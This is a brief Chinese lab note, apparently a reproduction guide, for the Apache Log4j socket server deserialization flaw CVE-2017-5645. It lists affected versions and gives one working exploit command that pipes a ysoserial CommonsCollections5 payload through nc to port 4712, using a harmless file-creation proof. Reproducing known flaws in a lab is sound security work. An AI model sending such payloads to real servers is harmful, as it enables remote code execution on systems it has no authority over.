Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
影响范围Apache Log4j 2.8.2之前的2.x版本漏洞复现使用ysoserial生成payload,然后直接发送给your-ip:4712端口即可java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712返回容器查看